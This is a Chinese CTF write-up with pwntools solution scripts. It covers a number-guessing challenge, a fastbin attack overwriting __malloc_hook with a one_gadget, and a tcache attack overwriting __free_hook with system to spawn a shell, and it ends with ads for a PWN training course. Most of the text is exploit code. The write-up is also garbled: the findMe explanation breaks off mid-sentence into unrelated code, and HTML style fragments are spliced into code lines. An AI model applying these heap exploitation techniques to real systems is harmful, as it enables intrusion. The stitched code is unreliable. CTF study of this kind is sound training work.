0X00 Misc
findMe
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
#---------------------Setting-----------------------
host = '121.40.216.20'
port = 9999
context.log_level = 'debug'
#---------------------Setting-----------------------
def main(r):
ground, sky = pow(2,127), pow(2,128)
for i in range(200):
t = abs(sky-ground)/3+1
r.recvline()
r.sendline(hex(ground))
r.recvline()
r.sendline(hex(sky))
if t == 1:
g1, g2 = sky-t, sky-t
else:
g1, g2 = sky-t, sky
r.recvline()
r.sendline(hex(g1))
r.recvline()
r.sendline(hex(g2))
ans = r.recvline()[:-1]
if 'flag' in ans:
print ans
return
elif ans == '2':
sky = sky - t
else:
ground = sky - t
if __name__ == '__main__':
while True:
try:
r = remote(host, port)
main(r)
break
except:
r.close()
pass
分析源码可以知道,此题是一个数学题。题中每次连接都会生成一个随机secret,而我们要做的事就是先输入g,s,满足以下数学约束,就可以继续输入:
g malloc_hook = libc.sym['__malloc_hook']
info("libc.address 0x%x", libc.address)
info("one_shot 0x%x", style="box-sizing: border-box; padding-right: 0.1px;"> info("malloc_hook 0x%x", malloc_hook)
# free list
delete(5)
delete(4)
# edit point to __malloc_hook
edit(4, 8, p64(malloc_hook-0x23))
# alloc __malloc_hook
alloc(7, 0x60)
alloc(8, 0x60)
# write style="box-sizing: border-box; padding-right: 0.1px;"> edit(8, 0x1b, chr(0)*3 + p64(0)*2 + p64(one_shot))
alloc(20, 20)
#zx(0x1309)
#alloc(9, 0x60)
s.irt()
#clean()
#ctf{63f2fa2d7f94394dc3d8e9be1abd34c4}
def dump():
pwn()
s.recv(timeout=1)
s.sl("cat fkroman")
s.sl("exit")
data = s.ra()
f = open("dump", "wb")
f.write(data)
f.close()
if __name__ == "__main__":
pwn()
tcache attack,先free掉7次填充tcache bin,当下一次free掉,chunk进入unsorted bin,调用show泄漏出libc地址。覆盖tcache的fd指针为__free_hook,malloc到该处写入system地址,调用free("/bin/sh")拿shell
from pwn import *
p = process('./amazon')
# p = remote('121.41.38.38', 9999)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level = 'debug'
def launch_gdb():
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
gdb.attach(proc.pidof(p)[0])
def new(s,d):
p.recvuntil('choice:')
p.sendline('1')
p.recvuntil('buy:')
p.sendline('2')
p.recvuntil('many:')
p.sendline('1')
p.recvuntil('note:')
p.sendline(str(s))
p.recvuntil('Content:')
p.sendline(d)
def free(i):
p.recvuntil('choice:')
p.sendline('3')
p.recvuntil('for:')
p.sendline(str(i))
def show():
p.recvuntil('choice:')
p.sendline('2')
# launch_gdb()
new(0xa0,'cnm') # 0
for _ in xrange(7):
free(0)
new(0xb0,'fuck') # 1
for _ in xrange(7):
free(1)
new(0x20,'fuck') # 2
free(0)
show()
p.recvuntil('Name: ')
leak = u64(p.recv(6).ljust(8,'\x00'))
log.info('leak ' + hex(leak))
libc_base = leak - 4111520
free(1)
new(0x100,p64(libc_base + 4118760 - 0x40) * (0x100/8)) # 3
new(0xb0,'nmsl\x00')
free(3)
new(0x100,'/bin/sh\x00' * (0x100/8))
new(0xb0,p64(0) * 4 + p64(libc_base + libc.symbols['system']))
free(1)
p.interactive()
CTF-PWN训练可到合天网安实验室学习课程——CTF-PWN进阶训练:本课程旨在帮助CTF初学者快速掌握复杂PWN题型的基本解题思路与技巧,包括溢出模型、信息泄露、ROP等。扫描下方二维码或点击文末“阅读原文”可预览学习。
别忘了投稿哦
大家有好的技术原创文章
欢迎投稿至邮箱:edu@heetian.com
合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦
有才能的你快来投稿吧!
了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!
点击“阅读全文”,注册学习
